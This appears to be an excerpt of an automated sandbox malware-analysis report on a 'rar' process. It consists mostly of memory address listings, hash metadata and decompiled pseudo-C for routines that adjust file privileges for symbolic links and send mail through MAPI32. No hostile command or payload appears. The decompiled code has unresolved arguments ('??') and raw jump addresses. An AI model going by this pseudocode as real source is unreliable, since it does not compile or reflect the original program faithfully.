                                                                                                            0x7ff650b7bba0
                                                                                                            0x7ff650b7bba3
                                                                                                            0x7ff650b7bbaa
                                                                                                            0x7ff650b7bbaf
                                                                                                            0x7ff650b7bbb2
                                                                                                            0x7ff650b7bbb9
                                                                                                            0x7ff650b7bbbe
                                                                                                            0x7ff650b7bbc5
                                                                                                            0x7ff650b7bbcd
                                                                                                            0x7ff650b7bbd1
                                                                                                            0x7ff650b7bbde
                                                                                                            0x7ff650b7bbe1
                                                                                                            0x7ff650b7bbe5
                                                                                                            0x7ff650b7bbe8
                                                                                                            0x7ff650b7bbee
                                                                                                            0x7ff650b7bbf9
                                                                                                            0x7ff650b7bbff
                                                                                                            0x7ff650b7bc03
                                                                                                            0x7ff650b7bc22
                                                                                                            0x7ff650b7bc33
                                                                                                            0x7ff650b7bc39
                                                                                                            0x7ff650b7bc69
                                                                                                            0x7ff650b7bc6e
                                                                                                            0x7ff650b7bc77
                                                                                                            0x7ff650b7bc7d
                                                                                                            0x7ff650b7bc85
                                                                                                            0x7ff650b7bc87
                                                                                                            0x7ff650b7bc8a
                                                                                                            0x7ff650b7bc8e
                                                                                                            0x7ff650b7bc96
                                                                                                            0x7ff650b7bc9f
                                                                                                            0x7ff650b7bca5
                                                                                                            0x7ff650b7bcab
                                                                                                            0x7ff650b7bcc9
                                                                                                            0x7ff650b7bccf
                                                                                                            0x7ff650b7bcd4
                                                                                                            0x7ff650b7bcda
                                                                                                            0x7ff650b7bcdf
                                                                                                            0x7ff650b7bce4
                                                                                                            0x7ff650b7bce8
                                                                                                            0x7ff650b7bceb
                                                                                                            0x7ff650b7bced
                                                                                                            0x7ff650b7bcf0
                                                                                                            0x7ff650b7bcf6
                                                                                                            0x7ff650b7bcfb
                                                                                                            0x7ff650b7bcff
                                                                                                            0x7ff650b7bd08
                                                                                                            0x7ff650b7bd0e
                                                                                                            0x7ff650b7bd14
                                                                                                            0x7ff650b7bd18
                                                                                                            0x7ff650b7bd1b
                                                                                                            0x7ff650b7bd21
                                                                                                            0x7ff650b7bd28
                                                                                                            0x7ff650b7bd2f
                                                                                                            0x7ff650b7bd38
                                                                                                            0x7ff650b7bd3d
                                                                                                            0x7ff650b7bd44
                                                                                                            0x7ff650b7bd49
                                                                                                            0x7ff650b7bd4e
                                                                                                            0x7ff650b7bd54
                                                                                                            0x7ff650b7bd59
                                                                                                            0x7ff650b7bd5f
                                                                                                            0x7ff650b7bd68
                                                                                                            0x7ff650b7bd71
                                                                                                            0x7ff650b7bd77
                                                                                                            0x7ff650b7bd7a
                                                                                                            0x7ff650b7bd7d
                                                                                                            0x7ff650b7bd97
                                                                                                            0x7ff650b7bd9b
                                                                                                            0x7ff650b7bda1
                                                                                                            0x7ff650b7bda3
                                                                                                            0x7ff650b7bdaf
                                                                                                            0x7ff650b7bdc2
                                                                                                            0x7ff650b7bdc6
                                                                                                            0x7ff650b7bdca
                                                                                                            0x7ff650b7bdce
                                                                                                            0x7ff650b7bdd5
                                                                                                            0x7ff650b7bdd9
                                                                                                            0x7ff650b7bddc
                                                                                                            0x7ff650b7bddf
                                                                                                            0x7ff650b7bde4
                                                                                                            0x7ff650b7bdee
                                                                                                            0x7ff650b7bdf4
                                                                                                            0x7ff650b7bdfe
                                                                                                            0x7ff650b7be03
                                                                                                            0x7ff650b7be09
                                                                                                            0x7ff650b7be11
                                                                                                            0x7ff650b7be11
                                                                                                            0x7ff650b7be15
                                                                                                            0x7ff650b7be1c
                                                                                                            0x7ff650b7be23
                                                                                                            0x7ff650b7be28
                                                                                                            0x7ff650b7be2e
                                                                                                            0x7ff650b7be31
                                                                                                            0x7ff650b7be38
                                                                                                            0x7ff650b7be3d
                                                                                                            0x7ff650b7be42
                                                                                                            0x7ff650b7be46
                                                                                                            0x7ff650b7be54
                                                                                                            0x7ff650b7be5e
                                                                                                            0x7ff650b7be64
                                                                                                            0x7ff650b7be82
                                                                                                            0x7ff650b7be8a
                                                                                                            0x7ff650b7be97
                                                                                                            0x7ff650b7be9e
                                                                                                            0x7ff650b7bea2
                                                                                                            0x7ff650b7bea8
                                                                                                            0x7ff650b7beb1
                                                                                                            0x7ff650b7beb6
                                                                                                            0x7ff650b7bebe
                                                                                                            0x7ff650b7bec2
                                                                                                            0x7ff650b7becb
                                                                                                            0x7ff650b7bed0
                                                                                                            0x7ff650b7beda
                                                                                                            0x7ff650b7bee1
                                                                                                            0x7ff650b7bef0
                                                                                                            0x7ff650b7bef6
                                                                                                            0x7ff650b7bf01
                                                                                                            0x7ff650b7bf07
                                                                                                            0x7ff650b7bf0d
                                                                                                            0x7ff650b7bf10
                                                                                                            0x7ff650b7bf14
                                                                                                            0x7ff650b7bf1b
                                                                                                            0x7ff650b7bf29
                                                                                                            0x7ff650b7bf32
                                                                                                            0x7ff650b7bf37
                                                                                                            0x7ff650b7bf3e
                                                                                                            0x7ff650b7bf43
                                                                                                            0x7ff650b7bf48
                                                                                                            0x7ff650b7bf4e
                                                                                                            0x7ff650b7bf53
                                                                                                            0x7ff650b7bf57
                                                                                                            0x7ff650b7bf5c
                                                                                                            0x7ff650b7bf65
                                                                                                            0x7ff650b7bf6b
                                                                                                            0x7ff650b7bf75
                                                                                                            0x7ff650b7bf7a
                                                                                                            0x7ff650b7bf84
                                                                                                            0x7ff650b7bf92
                                                                                                            0x7ff650b7bf9b
                                                                                                            0x7ff650b7bfa4
                                                                                                            0x7ff650b7bfa9
                                                                                                            0x7ff650b7bfb2
                                                                                                            0x7ff650b7bfb4
                                                                                                            0x7ff650b7bfb7
                                                                                                            0x7ff650b7bfba
                                                                                                            0x7ff650b7bfc0
                                                                                                            0x7ff650b7bfdf
                                                                                                            0x7ff650b7bfe4
                                                                                                            0x7ff650b7bfee
                                                                                                            0x7ff650b7bff3
                                                                                                            0x7ff650b7bff8
                                                                                                            0x7ff650b7bffc
                                                                                                            0x7ff650b7bfff
                                                                                                            0x7ff650b7c003
                                                                                                            0x7ff650b7c005
                                                                                                            0x7ff650b7c014
                                                                                                            0x7ff650b7c018
                                                                                                            0x7ff650b7c025
                                                                                                            0x7ff650b7c029
                                                                                                            0x7ff650b7c02b
                                                                                                            0x7ff650b7c033
                                                                                                            0x7ff650b7c03e
                                                                                                            0x7ff650b7c040
                                                                                                            0x7ff650b7c043
                                                                                                            0x7ff650b7c049
                                                                                                            0x7ff650b7c05b
                                                                                                            0x7ff650b7c067
                                                                                                            0x7ff650b7c06c
                                                                                                            0x7ff650b7c072
                                                                                                            0x7ff650b7c077
                                                                                                            0x7ff650b7c07c
                                                                                                            0x7ff650b7c07f
                                                                                                            0x7ff650b7c081
                                                                                                            0x7ff650b7c084
                                                                                                            0x7ff650b7c092
                                                                                                            0x7ff650b7c09f
                                                                                                            0x7ff650b7c0a4
                                                                                                            0x7ff650b7c0b7
                                                                                                            0x7ff650b7c0bf
                                                                                                            0x7ff650b7c0c9
                                                                                                            0x7ff650b7c0cf
                                                                                                            0x7ff650b7c0d2
                                                                                                            0x7ff650b7c0d8
                                                                                                            0x7ff650b7c0ed
                                                                                                            0x7ff650b7c0fc
                                                                                                            0x7ff650b7c101
                                                                                                            0x7ff650b7c10a
                                                                                                            0x7ff650b7c112
                                                                                                            0x7ff650b7c11a
                                                                                                            0x7ff650b7c120
                                                                                                            0x7ff650b7c122
                                                                                                            0x7ff650b7c125
                                                                                                            0x7ff650b7c133
                                                                                                            0x7ff650b7c146
                                                                                                            0x7ff650b7c14b
                                                                                                            0x7ff650b7c14f
                                                                                                            0x7ff650b7c151
                                                                                                            0x7ff650b7c153
                                                                                                            0x7ff650b7c157
                                                                                                            0x7ff650b7c15b
                                                                                                            0x7ff650b7c162
                                                                                                            0x7ff650b7c166
                                                                                                            0x7ff650b7c16b
                                                                                                            0x7ff650b7c173
                                                                                                            0x7ff650b7c175
                                                                                                            0x7ff650b7c17e
                                                                                                            0x7ff650b7c186
                                                                                                            0x7ff650b7c18a
                                                                                                            0x7ff650b7c190
                                                                                                            0x7ff650b7c196
                                                                                                            0x7ff650b7c19c
                                                                                                            0x7ff650b7c19f
                                                                                                            0x7ff650b7c1a6
                                                                                                            0x7ff650b7c1ac
                                                                                                            0x7ff650b7c1af
                                                                                                            0x7ff650b7c1b5
                                                                                                            0x7ff650b7c1cc
                                                                                                            0x7ff650b7c1d7
                                                                                                            0x7ff650b7c1dc
                                                                                                            0x7ff650b7c1e2
                                                                                                            0x7ff650b7c1e7
                                                                                                            0x7ff650b7c1ec
                                                                                                            0x7ff650b7c1ef
                                                                                                            0x7ff650b7c1f1
                                                                                                            0x7ff650b7c1f4
                                                                                                            0x7ff650b7c202
                                                                                                            0x7ff650b7c20f
                                                                                                            0x7ff650b7c214
                                                                                                            0x7ff650b7c21b
                                                                                                            0x7ff650b7c21f
                                                                                                            0x7ff650b7c224
                                                                                                            0x7ff650b7c227
                                                                                                            0x7ff650b7c22a
                                                                                                            0x7ff650b7c22d
                                                                                                            0x7ff650b7c248
                                                                                                            0x7ff650b7c24b
                                                                                                            0x7ff650b7c24f
                                                                                                            0x7ff650b7c255
                                                                                                            0x7ff650b7c25a
                                                                                                            0x7ff650b7c25d
                                                                                                            0x7ff650b7c263
                                                                                                            0x7ff650b7c268
                                                                                                            0x7ff650b7c26e
                                                                                                            0x7ff650b7c272
                                                                                                            0x7ff650b7c278
                                                                                                            0x7ff650b7c27e
                                                                                                            0x7ff650b7c281
                                                                                                            0x7ff650b7c29b
                                                                                                            0x7ff650b7c29d
                                                                                                            0x7ff650b7c2ba
                                                                                                            0x7ff650b7c2bc
                                                                                                            0x7ff650b7c2d9
                                                                                                            0x7ff650b7c2db
                                                                                                            0x7ff650b7c2f8
                                                                                                            0x7ff650b7c303
                                                                                                            0x7ff650b7c305
                                                                                                            0x7ff650b7c331

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                            • API String ID: 281475176-2761157908
                                                                                                            • Opcode ID: 8a6f926bc3384dfb24d3d345a1fb424e33362ad30212911cec5fb5c9681415c0
                                                                                                            • Instruction ID: 43b007cd586ed7e8331212094c586d532cffbb194ea2dd4a19560231f8b0568f
                                                                                                            • Opcode Fuzzy Hash: 8a6f926bc3384dfb24d3d345a1fb424e33362ad30212911cec5fb5c9681415c0
                                                                                                            • Instruction Fuzzy Hash: BFB20872A082839BE7258E65D480BFD37A5FB45388F585139DA0BB7B85DF3AE5048F40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2D110 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 344fileCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00007FF67FF650B2D110(signed int __ecx, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				void* __rbp;
				signed int _t42;
				signed int _t48;
				signed int _t49;
				void* _t54;
				signed long long _t68;
				void* _t75;
				void* _t94;
				signed short* _t97;
				void* _t100;
				signed long long _t103;
				void* _t108;
				void* _t110;
				signed long long _t111;
				void* _t113;
				void* _t116;
				void* _t117;
				signed long long _t118;
				void* _t126;
				void* _t127;
				void* _t129;

				_t113 = __r8;
				_t48 = __ecx;
				 *((long long*)(_t110 + 0x20)) = __rbx;
				_push(_t100);
				_push(_t94);
				_push(_t118);
				_t108 = _t110 - 0x2fd0;
				E00007FF67FF650B69CB0(0x30d0, __rax, _t116, _t117);
				_t111 = _t110 - __rax;
				_t68 =  *0x50b978f0; // 0x27db226282f1
				 *(_t108 + 0x2fc0) = _t68 ^ _t111;
				_t127 = __r8;
				_t75 = __rdx;
				 *((long long*)(_t111 + 0x48)) = __rcx;
				_t5 = _t94 + 1; // 0x1
				r15d = _t5;
				_t54 =  *0x50ba799f - dil; // 0x0
				if (_t54 != 0) goto 0x50b2d17f;
				E00007FF67FF650B2EE14(__rdx, L"SeRestorePrivilege", _t100, _t129);
				E00007FF67FF650B2EE14(_t75, L"SeCreateSymbolicLinkPrivilege", _t100, _t126);
				 *0x50ba799f = r15b;
				E00007FF67FF650B11344(_t68 ^ _t111, _t111 + 0x58);
				r8d = 0x800;
				E00007FF67FF650B5A390(_t108 + 0xfc0, _t127 + 0x111c, _t113);
				if ( *((intOrPtr*)(_t108 + 0xfc0 + ((_t118 | 0xffffffff) + 1) * 2)) != 0) goto 0x50b2d1b6;
				r8d = 4;
				_t49 = _t48 & 0xffffff00 | E00007FF67FF650B71950(_t113) == 0x00000000;
				 *(_t111 + 0x40) = _t49;
				_t96 =  !=  ? _t108 + 0xfc0 : _t108 + 0xfc8;
				if (_t49 == 0) goto 0x50b2d235;
				r8d = 4;
				if (E00007FF67FF650B71950(_t113) != 0) goto 0x50b2d235;
				 *((short*)(_t108 + 0x1fc0)) = 0x5c;
				_t97 = ( !=  ? _t108 + 0xfc0 : _t108 + 0xfc8) + 6;
				_t103 = _t108 + 0x1fc2 - _t97;
				r8d = 2;
				_t42 =  *_t97 & 0x0000ffff;
				 *(_t97 + _t103) = _t42;
				if (_t42 != 0) goto 0x50b2d23e;
				if ( *((intOrPtr*)(_t108 + 0x1fc0 + ((_t103 | 0xffffffff) + 1) * 2)) != 0) goto 0x50b2d25a;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x48)) + 0x71bb)) != dil) goto 0x50b2d2d6;
				if ( *(_t111 + 0x40) != 0) goto 0x50b2d29c;
				if (E00007FF67FF650B44888( *(_t111 + 0x40), _t127 + 0x111c) != 0) goto 0x50b2d29c;
				if (E00007FF67FF650B2E680(_t75,  *((intOrPtr*)(_t111 + 0x48)), _t127 + 0x28, (_t103 | 0xffffffff) + 1, _t108, _t75, _t127 + 0x111c) != 0) goto 0x50b2d2d9;
				r15b = dil;
				E00007FF67FF650B11534(_t111 + 0x58);
				return E00007FF67FF650B69D10(r15b,  *(_t111 + 0x40),  *(_t108 + 0x2fc0) ^ _t111);
			}

























                                                                                                            0x7ff650b2d110
                                                                                                            0x7ff650b2d110
                                                                                                            0x7ff650b2d110
                                                                                                            0x7ff650b2d116
                                                                                                            0x7ff650b2d117
                                                                                                            0x7ff650b2d118
                                                                                                            0x7ff650b2d120
                                                                                                            0x7ff650b2d12d
                                                                                                            0x7ff650b2d132
                                                                                                            0x7ff650b2d135
                                                                                                            0x7ff650b2d13f
                                                                                                            0x7ff650b2d146
                                                                                                            0x7ff650b2d149
                                                                                                            0x7ff650b2d14c
                                                                                                            0x7ff650b2d153
                                                                                                            0x7ff650b2d153
                                                                                                            0x7ff650b2d157
                                                                                                            0x7ff650b2d15e
                                                                                                            0x7ff650b2d167
                                                                                                            0x7ff650b2d173
                                                                                                            0x7ff650b2d178
                                                                                                            0x7ff650b2d189
                                                                                                            0x7ff650b2d196
                                                                                                            0x7ff650b2d1a6
                                                                                                            0x7ff650b2d1be
                                                                                                            0x7ff650b2d1c7
                                                                                                            0x7ff650b2d1e2
                                                                                                            0x7ff650b2d1e5
                                                                                                            0x7ff650b2d1f9
                                                                                                            0x7ff650b2d1ff
                                                                                                            0x7ff650b2d201
                                                                                                            0x7ff650b2d21c
                                                                                                            0x7ff650b2d223
                                                                                                            0x7ff650b2d231
                                                                                                            0x7ff650b2d235
                                                                                                            0x7ff650b2d238
                                                                                                            0x7ff650b2d23e
                                                                                                            0x7ff650b2d241
                                                                                                            0x7ff650b2d24b
                                                                                                            0x7ff650b2d261
                                                                                                            0x7ff650b2d26f
                                                                                                            0x7ff650b2d273
                                                                                                            0x7ff650b2d27f
                                                                                                            0x7ff650b2d29a
                                                                                                            0x7ff650b2d29c
                                                                                                            0x7ff650b2d2a4
                                                                                                            0x7ff650b2d2d5

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$Create$DirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                            • API String ID: 382833884-3508440684
                                                                                                            • Opcode ID: 02ed7963cc5743e81573c6b7d316a997bb9194fe485458416bd8e7cd29a9ccaf
                                                                                                            • Instruction ID: d8bfbb9c39ba39a623e18265d5ac40d246017f268d1c70086fd6a7374001d1a3
                                                                                                            • Opcode Fuzzy Hash: 02ed7963cc5743e81573c6b7d316a997bb9194fe485458416bd8e7cd29a9ccaf
                                                                                                            • Instruction Fuzzy Hash: 69E1B122A08A87A6EB60DB24D9806FD33A0FF52798F584131DA5EA7BD5DF3DE505C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5A7B4 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 34%
                                                                                                            			E00007FF67FF650B5A7B4(void* __ebx, void* __esp, void* __rax, long long __rbx, long long __rcx, long long __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				long _t119;
				void* _t124;
				intOrPtr _t188;
				signed long long _t195;
				long long _t197;
				signed long long _t199;
				long long _t203;
				long long _t204;
				signed long long _t205;
				long long _t209;
				long long _t210;
				long long _t212;
				intOrPtr _t231;
				void* _t252;
				long _t262;
				char* _t263;
				intOrPtr* _t267;
				void* _t270;
				signed long long _t273;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				signed long long _t281;
				void* _t288;
				void* _t289;
				struct HINSTANCE__* _t290;
				struct HINSTANCE__* _t293;
				struct HINSTANCE__* _t296;
				void* _t299;
				char* _t304;

				_t283 = __r8;
				 *((long long*)(_t280 + 0x18)) = __rbx;
				_t278 = _t280 - 0x2150;
				E00007FF67FF650B69CB0(0x2250, __rax, _t288, _t289);
				_t281 = _t280 - __rax;
				_t195 =  *0x50b978f0; // 0x27db226282f1
				 *(_t278 + 0x2140) = _t195 ^ _t281;
				_t197 = __rdx;
				_t209 = __rcx;
				 *((long long*)(_t281 + 0x50)) = __rcx;
				r13d = 0;
				if (__rdx != 0) goto 0x50b5a802;
				goto 0x50b5a81e;
				r8d = 0x400;
				E00007FF67FF650B5D390(__ebx, __rcx, __rdx, _t278 + 0x540, __r8);
				_t263 = _t278 + 0x540;
				E00007FF67FF650B5AD44(__rdx, L"MAPI32.DLL", _t299);
				if (_t197 == 0) goto 0x50b5abf2;
				GetProcAddress(_t296);
				 *((long long*)(_t281 + 0x60)) = _t197;
				GetProcAddress(_t293);
				 *((long long*)(_t281 + 0x48)) = _t197;
				GetProcAddress(_t290);
				if (_t197 == 0) goto 0x50b5abe9;
				if (_t197 == 0) goto 0x50b5abe9;
				if (_t197 == 0) goto 0x50b5abe9;
				if (_t263 == 0) goto 0x50b5a8b0;
				if ( *_t263 != 0x2e) goto 0x50b5a8b0;
				 *((char*)(_t281 + 0x40)) = 1;
				if ( *((intOrPtr*)(_t263 + 1)) != r13b) goto 0x50b5a8b5;
				_t265 = _t293;
				goto 0x50b5a8b5;
				 *((intOrPtr*)(_t281 + 0x40)) = r13b;
				E00007FF67FF650B5ADC4(0, _t197, __rcx);
				GetCurrentDirectoryW(_t262);
				r8d = 0x800;
				_t252 = _t278 + 0x940;
				E00007FF67FF650B5D390(__ebx, _t209, _t209, _t252, _t283);
				E00007FF67FF650B44CC0(1, _t197, _t209, _t278 + 0x940, _t270, _t277);
				_t119 = GetFullPathNameA(??, ??, ??, ??);
				 *(_t278 - 0x70) = _t293;
				 *((intOrPtr*)(_t278 - 0x64)) = r13d;
				 *(_t278 - 0x50) = _t293;
				 *(_t278 - 0x68) =  *(_t278 - 0x68) | 0xffffffff;
				 *((long long*)(_t278 - 0x60)) = _t278 + 0x20;
				_t210 =  *((intOrPtr*)(_t281 + 0x58));
				 *((long long*)(_t278 - 0x58)) = _t210;
				_t26 = _t252 + 0x60; // 0x60
				r8d = _t26;
				E00007FF67FF650B6C1A0(_t119, 0, _t278 - 0x40, _t252, _t278 + 0x20);
				 *(_t278 + 0x10) = 1;
				_t199 = _t278 - 0x70;
				 *(_t278 + 0x18) = _t199;
				 *((long long*)(_t278 - 0x30)) = _t210;
				 *((long long*)(_t278 - 0x38)) = _t210;
				 *(_t281 + 0x68) = _t293;
				 *(_t281 + 0x70) = _t293;
				 *(_t281 + 0x78) = _t293;
				 *(_t278 - 0x80) = _t293;
				 *((intOrPtr*)(_t278 - 0x78)) = r13b;
				if (_t293 == 0) goto 0x50b5ab13;
				E00007FF67FF650B5A6AC(r13d, __esp, _t293, _t281 + 0x68, _t252, _t293, _t293, _t281 + 0x58);
				_t273 = _t199 + _t199 * 4;
				_t212 =  *(_t281 + 0x68);
				asm("xorps xmm0, xmm0");
				asm("movups [ebx+esi*8], xmm0");
				asm("movups [ebx+esi*8+0x10], xmm0");
				 *(_t212 + 0x20 + _t273 * 8) = _t199;
				r8d = 0x405;
				_t124 = E00007FF67FF650B5A2A8(_t278 + 0x130, "SMTP:", _t278 + 0x20);
				r8d = 0x405;
				E00007FF67FF650B5A26C(_t124, _t199, _t278 + 0x130, _t265, _t278 + 0x20);
				E00007FF67FF650B734F0(_t265, ";,");
				if (_t199 == 0) goto 0x50b5aa06;
				_t304 = _t199 + 1;
				if (E00007FF67FF650B59F50( *_t304) != 0) goto 0x50b5a9f6;
				E00007FF67FF650B734F0(_t278 + 0x130, ";,");
				if (_t199 == 0) goto 0x50b5aa21;
				 *_t199 = 0;
				 *(_t212 + 4 + _t273 * 8) = 1;
				 *((long long*)(_t281 + 0x28)) = _t281 + 0x48;
				 *(_t281 + 0x20) =  *(_t281 + 0x20) & 0x00000000;
				r9d = 1;
				if ( *0x50b80550() != 0) goto 0x50b5aae4;
				 *((intOrPtr*)(_t212 + _t273 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x48))));
				_t203 =  *((intOrPtr*)(_t281 + 0x48));
				if ( *((intOrPtr*)(_t203 + 8)) == 0) goto 0x50b5aa81;
				E00007FF67FF650B74824(_t212,  *((intOrPtr*)(_t203 + 8)), _t273);
				 *((long long*)(_t212 + 8 + _t273 * 8)) = _t203;
				_t204 =  *((intOrPtr*)(_t281 + 0x48));
				if ( *((intOrPtr*)(_t204 + 0x10)) == 0) goto 0x50b5aa99;
				E00007FF67FF650B74824(_t212,  *((intOrPtr*)(_t204 + 0x10)), _t273);
				 *((long long*)(_t212 + 0x10 + _t273 * 8)) = _t204;
				_t205 =  *((intOrPtr*)(_t281 + 0x48));
				 *((intOrPtr*)(_t212 + 0x18 + _t273 * 8)) =  *((intOrPtr*)(_t205 + 0x18));
				_t231 =  *((intOrPtr*)(_t281 + 0x48));
				if ( *((long long*)(_t231 + 0x20)) == 0) goto 0x50b5aad9;
				if ( *((intOrPtr*)(_t231 + 0x18)) == 0) goto 0x50b5aad9;
				0x50b6ede0();
				 *(_t212 + 0x20 + _t273 * 8) = _t205;
				r8d =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x48)) + 0x18));
				E00007FF67FF650B6BAF0();
				 *0x50b80550();
				goto 0x50b5aaf5;
				E00007FF67FF650B74824(_t212, _t278 + 0x130, _t273);
				 *((long long*)(_t212 + 0x10 + _t273 * 8)) = _t197;
				 *_t278 =  *_t278 + 1;
				if (_t304 != 0) goto 0x50b5a983;
				 *((long long*)(_t278 + 8)) = _t212;
				r13b =  *((intOrPtr*)(_t278 - 0x78));
				asm("inc ebp");
				r9d = r9d & 0xfffffff8;
				r9d = r9d + 9;
				 *(_t281 + 0x20) =  *(_t281 + 0x20) & 0x00000000;
				r12b =  *0x50b80550() - 2 > 0;
				if ( *(_t281 + 0x70) == 0) goto 0x50b5ab7c;
				_t97 = _t212 + 0x10; // 0x10
				_t267 = _t97;
				if ( *((intOrPtr*)(_t267 - 8)) == 0) goto 0x50b5ab57;
				0x50b6edd8();
				if ( *_t267 == 0) goto 0x50b5ab64;
				0x50b6edd8();
				_t188 =  *((intOrPtr*)(_t267 + 0x10));
				if (_t188 == 0) goto 0x50b5ab72;
				0x50b6edd8();
				if (_t188 != 0) goto 0x50b5ab49;
				SetCurrentDirectoryW(??);
				FreeLibrary(??);
				E00007FF67FF650B5ADC4(1,  *((intOrPtr*)(_t281 + 0x60)), _t212);
				if (r12b == 0) goto 0x50b5abb1;
				if ( *((char*)(_t281 + 0x40)) == 0) goto 0x50b5abc1;
				E00007FF67FF650B33184(__ebx,  *((intOrPtr*)(_t281 + 0x60)), _t212,  *((intOrPtr*)(_t281 + 0x50)));
				goto 0x50b5abc1;
				E00007FF67FF650B111C0(0x4e,  *((intOrPtr*)(_t281 + 0x50)));
				if (_t212 == 0) goto 0x50b5abe4;
				if (r13b == 0) goto 0x50b5abdb;
				E00007FF67FF650B57B7C(0x4e, r13d, __esp, _t212,  *(_t281 + 0x78) +  *(_t281 + 0x78) * 4 << 3, _t267 + 0x28);
				0x50b6edd8();
				goto 0x50b5abf4;
				FreeLibrary(??);
				return E00007FF67FF650B69D10(0, 0x4e,  *(_t278 + 0x2140) ^ _t281);
			}



































                                                                                                            0x7ff650b5a7b4
                                                                                                            0x7ff650b5a7b4
                                                                                                            0x7ff650b5a7c4
                                                                                                            0x7ff650b5a7d1
                                                                                                            0x7ff650b5a7d6
                                                                                                            0x7ff650b5a7d9
                                                                                                            0x7ff650b5a7e3
                                                                                                            0x7ff650b5a7ea
                                                                                                            0x7ff650b5a7ed
                                                                                                            0x7ff650b5a7f0
                                                                                                            0x7ff650b5a7f5
                                                                                                            0x7ff650b5a7fb
                                                                                                            0x7ff650b5a800
                                                                                                            0x7ff650b5a802
                                                                                                            0x7ff650b5a812
                                                                                                            0x7ff650b5a817
                                                                                                            0x7ff650b5a825
                                                                                                            0x7ff650b5a830
                                                                                                            0x7ff650b5a840
                                                                                                            0x7ff650b5a849
                                                                                                            0x7ff650b5a858
                                                                                                            0x7ff650b5a861
                                                                                                            0x7ff650b5a870
                                                                                                            0x7ff650b5a87c
                                                                                                            0x7ff650b5a885
                                                                                                            0x7ff650b5a88e
                                                                                                            0x7ff650b5a897
                                                                                                            0x7ff650b5a89c
                                                                                                            0x7ff650b5a89e
                                                                                                            0x7ff650b5a8a9
                                                                                                            0x7ff650b5a8ab
                                                                                                            0x7ff650b5a8ae
                                                                                                            0x7ff650b5a8b0
                                                                                                            0x7ff650b5a8b7
                                                                                                            0x7ff650b5a8ca
                                                                                                            0x7ff650b5a8d0
                                                                                                            0x7ff650b5a8d3
                                                                                                            0x7ff650b5a8dd
                                                                                                            0x7ff650b5a8eb
                                                                                                            0x7ff650b5a905
                                                                                                            0x7ff650b5a90b
                                                                                                            0x7ff650b5a90f
                                                                                                            0x7ff650b5a913
